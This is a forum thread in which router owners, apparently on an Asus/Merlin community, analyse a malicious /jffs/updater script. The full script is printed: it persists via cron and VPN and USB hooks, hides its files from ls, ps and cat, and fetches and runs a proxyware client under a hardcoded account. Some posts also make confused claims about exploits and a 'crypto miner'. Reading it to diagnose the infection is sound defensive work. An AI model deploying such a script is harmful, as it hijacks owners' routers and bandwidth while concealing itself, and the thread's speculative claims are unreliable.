Malware /jffs/updater script.

[netware5]

The presence of proton.me domain in the script is very strange. It belongs to the Proton Mail, which is well known as an extremely secure mail, vpn and cloud storage service. Personally I have an ultimate trust to them. Maybe it is in the script just by coincidence or have been put there just to fool the possible investigations???

 

[follower]

I know English isn't your first language but what we've been discussing here is malware. An exploit would be the method used to get it onto the router.

Malware vs. Exploits

To better understand the differences between malware and exploits, we first have to define them and their purposes.

www.paloaltonetworks.com

Oh my...He's not infected by Malware. He just got attacked by SOMEONE with Exploit. That's why I'm talking about Exploit. You don't know about the codes(script) that he posted right? I do know about the Exploit he posted very well.

 

[drinkingbird]

I've already mentioned it.

None of your solution works if he's targeted. Because this is not a normal hacking but Exploit.

Hackers used an exploit to install malware. In fact, "normal hacking" would be worse, that would mean someone is actively trying to hack you rather than just an automated botnet finding a way in.

You're not making any sense. This user likely was not "targeted". These groups flood out looking for vulnerabilities, and when they find one, they (usually in an automated fashion) use it. If you fix the vulnerability and clean the malware, they move on. Unless they know you have a bunch of crypto or something else of a lot of value, they are not wasting hours of time on you. They spend that time on banks and crypto exchanges.

Saying you're screwed for life because you're "targeted" (how do you know they were) is absurd. Banks are targeted tens of thousands of times a day, the ones that have vulnerabilities get breached, the ones that don't carry on, they don't go out of business just because they see someone trying to get in.

 

[ColinTaylor]

It could possibly be ddns related, however one factor to consider is the wget log I posted shows that the first appearance happened right after a firmware update Check on the router was conducted.

We can't really assume that it's anything to do with wget itself or the firmware check. The log is after all a log just for processes that call wget, and they're not timestamped so we don't know how close together those events were.

The only thing for sure that the log tells us is that the unwanted wget call was initiated by the crontab entry.

 

[drinkingbird]

It could possibly be ddns related, however one factor to consider is the wget log I posted shows that the first appearance happened right after a firmware update Check on the router was conducted.

(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

While I am not saying it is RMerlin related. Someone snooping could have saw opportunity to exploit a vulnerability in wget or the connection. I am still a bit on the fence about this one. I was out of town the day the malware hit the router. No devices were online except for some IoT blocked cameras. All computers were fully shutdown.

Or you had the malware and it changed the download target for firmware in order to install a vulnerable one they've created. Or the update process just "woke" up the malware.

 

[drinkingbird]

Do not trust ANY consumer routers including ASUS. There are a lot of unknown vulnerabilities like Zero-Day attack. There are too many unknown vulnerabilities that manufacturers never know even in the future. Those vulnerabilities are traded for the money at black market.

Yup so instead everyone should buy a $10,000 enterprise router that is just as susceptible to vulnerabilities.

 

[drinkingbird]

Thanks for the information about the old firmware versions.

Yes you are right. I currently have these basic settings:

#WAN

MAC Address = Changed

#Firewall

Enable Firewall    = Yes
Enable DoS protection = Yes
Respond ICMP Echo (ping) Request from WAN = No

#System

Router Login Password = Strong
Enable SSH = Lan Only
Allow SSH Port Forwarding = No
SSH Port = Changed
Allow Password Login = No
Authorized Keys = Yes (+ private Key with strong password)

Authentication Method = HTTPS
HTTPS LAN port = Changed
Installed Server Certificate = Yes

Enable Web Access from WAN = No
Enable Access Restrictions = Yes (x2 devices of my network)

Note: In that option: "Allow Password Login = No", I have disabled to reject USER + PASSWORD login requests from SSH, only with the private key. Is this configuration/thought correct?

So what comes to my mind, for example these two "options":

- an infected client
- OpenVPN service vulnerability/misconfiguration (server/client) - I use this option a lot.

Is WireGuard currently more secure than OpenVPN? Or have the vulnerabilities not yet been discovered/exposed?

Both VPNs are only as secure as you configure them to be.

Password login disabled with requirement for private key is more secure so you're good there (as long as you generate a good key). I believe some SSH daemons can be configured for both private key and password but I don't believe that combo is supported here, believe it is one or the other. If nothing has changed, merlin default enables brute force protection on SSH so that also helps a lot, even with password login (but still recommend key login).

 

[drinkingbird]

Oh my...He's not infected by Malware. He just got attacked by SOMEONE with Exploit. That's why I'm talking about Exploit. You don't know about the codes(script) that he posted right? I do know about the Exploit he posted very well.

You're saying code/script is not malware? I think something is getting lost in translation.

 

[follower]

The presence of proton.me domain in the script is very strange. It belongs to the Proton Mail, which is well known as an extremely secure mail, vpn and cloud storage service. Personally I have an ultimate trust to them. Maybe it is in the script just by coincidence or have been put there just to fool the possible investigations???

It's like this. He got compromised with following process.
Attacker> Exploit > Attacker owns router> Attacker put some scripts into the router including source address which provides script file> script file has been downloaded> Attacker runs the script which was downloaded from source address> From now on, victim's router works as Proxy> Attacker uses this router as Paid Proxy Service for the money> Consumers don't know they are using someone's hacked router as Proxy.

 

[Viktor Jaep]

It makes sense though, how else would someone know they could monetize off the source routers connection. Obviously, the person knew what they were doing. It is a highly target approach to achieving their goal.

These hackers are going to be hugely disappointed if they're trying to turn our routers into bitcoin miners. LOL

 

[Tech9]

Reading about black marker and money... I'm interested in purchasing a pack of unknown vulnerabilities. There is a local farmer's market and all cash.

 

[follower]

You're saying code/script is not malware? I think something is getting lost in translation.

I'm pretty sure you are just talking about the definition from internet. In the real world, Malware and Exploit are different. Exploit is ATTACK or codes for Vulnerability Attack. Malware is just Payload in this situation. Payload is among Malware which can be used for attack tool.

 

[follower]

Reading about black marker and money... I'm interested in purchasing a pack of unknown vulnerabilities. There is a local farmer's market and all cash.

They give you dedicated tools if you pay for the money. You can find them easily.

 

[Swistheater]

Or you had the malware and it changed the download target for firmware in order to install a vulnerable one they've created. Or the update process just "woke" up the malware.

As much as I would like to believe this is the case, that went out the window today as I turned on several workstations that haven't been used in months. I updated the virus security definitions and ran security scans. Not a trace of infection on any. Ran virus checks on mobile devices as well. No infections detected.

It is possible it could have been embedded infection that was "woke" by the firmware checks, but then most likely more people would be here reporting the issue as I suspect other people would have had infected batches of firmware.

 

[follower]

As much as I would like to believe this is the case, that went out the window today as I turned on several workstations that haven't been used in months. I updated the virus security definitions and ran security scans. Not a trace of infection on any. Ran virus checks on mobile devices as well. No infections detected.

You are attacked by following process.
Attacker> Exploit > Attacker owns router> Attacker put some scripts into the router including source address which provides script file> script file has been downloaded> Attacker runs the script which was downloaded from source address> From now on, victim's router works as Proxy> Attacker uses this router as Paid Proxy Service for the money> Consumers don't know they are using someone's hacked router as Proxy. You don't have to listen to some guys above. They don't know about this type of attack. I know about this attack and exploit very well...Don't get me wrong. I'm not an attacker.

It is possible it could have been embedded infection that was "woke" by the firmware checks, but then most likely more people would be here reporting the issue as I suspect other people would have had infected batches of firmware.

It's almost impossible to do here. Because some of users here always say it doesn't exist and can't be happened. They don't even know about the exploit which made you compromised. They only know the definition of Malware and Exploit on internet.

 

[ColinTaylor]

The presence of proton.me domain in the script is very strange. It belongs to the Proton Mail, which is well known as an extremely secure mail, vpn and cloud storage service. Personally I have an ultimate trust to them. Maybe it is in the script just by coincidence or have been put there just to fool the possible investigations???

I have no doubt that Proton Mail is not knowingly involved in this. An email account is needed to run the pawns-cli software and associate multiple devices with that single account. I'm guessing this email account is also used by the malware creators to collect their money from IPRoyal.

 

[ATLga]

What is this random /jffs/updater script?

#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

* * * * * /jffs/updater #updater#

@RMerlin is this a default script?

Unfortunately this thread is going downhill fast. Also, surprised Merlin hasn’t jumped in here. Must be on vacation.

 

[ItsMeDude]

It's definitely malware. I decompiled the binary "https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli" in this link. It's a crypto miner.

It still sucks that it was on there, but having that on there is way better than a lot of alternatives. Below is a bit of the content from one of the files in the malware.

#include "pawns-cli.h"

word32 _cgo_init = 0x00; // 005E3828
word32 _cgo_notify_runtime_init_done = 0x00; // 005E382C
word32 _cgo_thread_start = 0x00; // 005E3830
word32 _cgo_yield = 0x00; // 005E3834
word32 compress/flate.fixedLiteralEncoding = 0x00; // 005E3838
word32 compress/flate.fixedOffsetEncoding = 0x00; // 005E383C
word32 compress/flate.huffOffset = 0x00; // 005E3840
word32 context.background = 0x00; // 005E3844
word32 context.closedchan = 0x00; // 005E3848
word32 context.todo = 0x00; // 005E384C
word32 crypto/ecdsa.one = 0x00; // 005E3850
word32 crypto/internal/edwards25519.d = 0x00; // 005E3854
word32 crypto/internal/edwards25519.d2 = 0x00; // 005E3858
word32 crypto/internal/edwards25519.feOne = 0x00; // 005E385C
word32 crypto/internal/edwards25519.generator = 0x00; // 005E3860
word32 crypto/internal/edwards25519.identity = 0x00; // 005E3864
word32 crypto/internal/nistec.p224B = 0x00; // 005E3868
word32 crypto/internal/nistec.p224G = 0x00; // 005E386C
word32 crypto/internal/nistec.p224GG = 0x00; // 005E3870
word32 crypto/internal/nistec.p224GeneratorTable = 0x00; // 005E3874
word32 crypto/internal/nistec.p224MinusOne = 0x00; // 005E3878
word32 crypto/internal/nistec.p256B = 0x00; // 005E387C
word32 crypto/internal/nistec.p256G = 0x00; // 005E3880
word32 crypto/internal/nistec.p256GeneratorTable = 0x00; // 005E3884
word32 crypto/internal/nistec.p384B = 0x00; // 005E3888
word32 crypto/internal/nistec.p384G = 0x00; // 005E388C
word32 crypto/internal/nistec.p384GeneratorTable = 0x00; // 005E3890
word32 crypto/internal/nistec.p521B = 0x00; // 005E3894
word32 crypto/internal/nistec.p521G = 0x00; // 005E3898
word32 crypto/internal/nistec.p521GeneratorTable = 0x00; // 005E389C
word32 crypto/internal/randutil.closedChan = 0x00; // 005E38A0
word32 crypto/rand.altGetRandom = 0x00; // 005E38A4
word32 crypto/rsa.bigOne = 0x00; // 005E38A8
word32 crypto/rsa.bigZero = 0x00; // 005E38AC
word32 crypto/rsa.hashPrefixes = 0x00; // 005E38B0
word32 crypto/tls.aesgcmCiphers = 0x00; // 005E38B4
word32 crypto/tls.alertText = 0x00; // 005E38B8
word32 crypto/tls.nonAESGCMAEADCiphers = 0x00; // 005E38BC
word32 crypto/x509.hashToPSSParameters = 0x00; // 005E38C0
word32 crypto/x509.systemRoots = 0x00; // 005E38C4
word32 crypto/x509/pkix.attributeTypeNames = 0x00; // 005E38C8
word32 encoding/asn1.bigOne = 0x00; // 005E38CC
word32 encoding/base64.RawStdEncoding = 0x00; // 005E38D0
word32 encoding/base64.RawURLEncoding = 0x00; // 005E38D4
word32 encoding/base64.StdEncoding = 0x00; // 005E38D8
word32 encoding/base64.URLEncoding = 0x00; // 005E38DC
word32 encoding/json.float32Encoder = 0x00; // 005E38E0
word32 encoding/json.float64Encoder = 0x00; // 005E38E4
word32 encoding/xml.HTMLEntity = 0x00; // 005E38E8
word32 encoding/xml.entity = 0x00; // 005E38EC
word32 encoding/xml.htmlEntity = 0x00; // 005E38F0
word32 flag.CommandLine = 0x00; // 005E38F4
word32 github.com/ethereum/go-ethereum/log.fieldPadding = 0x00; // 005E38F8
word32 github.com/ethereum/go-ethereum/p2p/nat.lan10 = 0x00; // 005E38FC
word32 github.com/ethereum/go-ethereum/p2p/nat.lan176 = 0x00; // 005E3900
word32 github.com/ethereum/go-ethereum/p2p/nat.lan192 = 0x00; // 005E3904
word32 github.com/gorilla/websocket.proxy_proxySchemes = 0x00; // 005E3908
word32 github.com/gorilla/websocket.validReceivedCloseCodes = 0x00; // 005E390C
word32 github.com/gwatts/rootcerts.serverCertPool = 0x00; // 005E3910
word32 github.com/huin/goupnp.CharsetReaderDefault = 0x00; // 005E3914
word32 github.com/huin/goupnp/httpu.trailingWhitespaceRx = 0x00; // 005E3918
word32 github.com/huin/goupnp/soap.completeDateTimeZoneRegexp = 0x00; // 005E391C
word32 github.com/huin/goupnp/soap.localLoc = 0x00; // 005E3920
word32 github.com/huin/goupnp/soap.timezoneRegexp = 0x00; // 005E3924
word32 github.com/huin/goupnp/soap.xmlCharRx = 0x00; // 005E3928
word32 github.com/huin/goupnp/ssdp.maxAgeRx = 0x00; // 005E392C
word32 golang.org/x/crypto/ssh.aeadCiphers = 0x00; // 005E3930
word32 golang.org/x/crypto/ssh.bigOne = 0x00; // 005E3934
word32 golang.org/x/crypto/ssh.certKeyAlgoNames = 0x00; // 005E3938
word32 golang.org/x/crypto/ssh.cipherModes = 0x00; // 005E393C
word32 golang.org/x/crypto/ssh.hashFuncs = 0x00; // 005E3940
word32 golang.org/x/crypto/ssh.kexAlgoMap = 0x00; // 005E3944
word32 golang.org/x/crypto/ssh.macModes = 0x00; // 005E3948
word32 golang.org/x/crypto/ssh.packetTypeNames = 0x00; // 005E394C
word32 golang.org/x/crypto/ssh.portRandomizer = 0x00; // 005E3950
word32 golang.org/x/crypto/ssh.serverForbiddenKexAlgos = 0x00; // 005E3954
word32 golang.org/x/crypto/ssh.signals = 0x00; // 005E3958
word32 hash/crc32.IEEETable = 0x00; // 005E395C
word32 hash/crc32.castagnoliTable = 0x00; // 005E3960
word32 hash/crc32.ieeeTable8 = 0x00; // 005E3964
word32 hash/crc32.updateCastagnoli = 0x00; // 005E3968
word32 hash/crc32.updateIEEE = 0x00; // 005E396C
word32 internal/intern.valMap = 0x00; // 005E3970
word32 internal/intern.valSafe = 0x00; // 005E3974
word32 internal/poll.disableSplice = 0x00; // 005E3978
word32 log.std = 0x00; // 005E397C
word32 main.acceptTos = 0x00; // 005E3980
word32 main.deviceID = 0x00; // 005E3984
word32 main.deviceTitle = 0x00; // 005E3988
word32 main.email = 0x00; // 005E398C
word32 main.password = 0x00; // 005E3990
word32 main.showTos = 0x00; // 005E3994
word32 math/rand.globalRand = 0x00; // 005E3998
word32 mime.builtinTypesLower = 0x00; // 005E399C
word32 mime.osInitMime = 0x00; // 005E39A0
word32 mime/multipart.emptyParams = 0x00; // 005E39A4
word32 mime/multipart.quoteEscaper = 0x00; // 005E39A8
word32 net.lookupOrderName = 0x00; // 005E39AC
word32 net.protocols = 0x00; // 005E39B0
word32 net.services = 0x00; // 005E39B4
word32 net.testHookDialTCP = 0x00; // 005E39B8
word32 net/http.cookieNameSanitizer = 0x00; // 005E39BC
word32 net/http.envProxyFuncValue = 0x00; // 005E39C0
word32 net/http.excludedHeadersNoBody = 0x00; // 005E39C4
word32 net/http.headerNewlineToSpace = 0x00; // 005E39C8
word32 net/http.htmlReplacer = 0x00; // 005E39CC
word32 net/http.http2errCodeName = 0x00; // 005E39D0
word32 net/http.http2flagName = 0x00; // 005E39D4
word32 net/http.http2frameName = 0x00; // 005E39D8
word32 net/http.http2frameParsers = 0x00; // 005E39DC
word32 net/http.http2got1xxFuncForTests = 0x00; // 005E39E0
word32 net/http.http2gracefulShutdownMsg = 0x00; // 005E39E4
word32 net/http.http2idleTimerMsg = 0x00; // 005E39E8
word32 net/http.http2settingName = 0x00; // 005E39EC
word32 net/http.http2settingsTimerMsg = 0x00; // 005E39F0
word32 net/http.http2shutdownTimerMsg = 0x00; // 005E39F4
word32 net/http.portMap = 0x00; // 005E39F8
word32 net/http.reqWriteExcludeHeader = 0x00; // 005E39FC
word32 net/http.respExcludeHeader = 0x00; // 005E3A00
word32 net/http.stateName = 0x00; // 005E3A04
word32 net/http.testHookClientDoResult = 0x00; // 005E3A08
word32 net/http.uniqNameNext = 0x00; // 005E3A0C
word32 net/netip.z4 = 0x00; // 005E3A10
word32 net/netip.z6noz = 0x00; // 005E3A14
word32 net/textproto.commonHeader = 0x00; // 005E3A18
word32 os.Stderr = 0x00; // 005E3A1C
word32 os.Stdin = 0x00; // 005E3A20
word32 os.Stdout = 0x00; // 005E3A24
word32 reflect.bytesType = 0x00; // 005E3A28

word32 vendor/golang.org/x/crypto/cryptobyte.bigOne = 0x00; // 005E3AC4
word32 vendor/golang.org/x/net/dns/dnsmessage.classNames = 0x00; // 005E3AC8
word32 vendor/golang.org/x/net/dns/dnsmessage.rCodeNames = 0x00; // 005E3ACC
word32 vendor/golang.org/x/net/dns/dnsmessage.sectionNames = 0x00; // 005E3AD0
word32 vendor/golang.org/x/net/dns/dnsmessage.typeNames = 0x00; // 005E3AD4
word32 vendor/golang.org/x/net/http/httpguts.badTrailer = 0x00; // 005E3AD8
word32 vendor/golang.org/x/net/http/httpproxy.portMap = 0x00; // 005E3ADC
word32 vendor/golang.org/x/net/http2/hpack.lazyRootHuffmanNode = 0x00; // 005E3AE0
word32 vendor/golang.org/x/net/http2/hpack.staticTable = 0x00; // 005E3AE4
word32 vendor/golang.org/x/text/unicode/bidi.controlToClass = 0x00; // 005E3AE8
word32 vendor/golang.org/x/text/unicode/bidi.trie = 0x00; // 005E3AEC
word32 vendor/golang.org/x/text/unicode/norm.nfcData = 0x00; // 005E3AF0
word32 vendor/golang.org/x/text/unicode/norm.nfkcData = 0x00; // 005E3AF4
word32 vendor/golang.org/x/text/unicode/norm.recompMap = 0x00; // 005E3AF8

 

[Viktor Jaep]

It's definitely malware. I decompiled the binary "https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli" in this link. It's a crypto miner.

It still sucks that it was on there, but having that on there is way better than a lot of alternatives. Below is a bit of the content from one of the files in the malware.

Lol @Tech9...

 

[heysoundude]

So my guess is that this is a modified version of some old malware that's been repurposed to monetize the theft of your bandwidth.

Crypto mining botnets perhaps?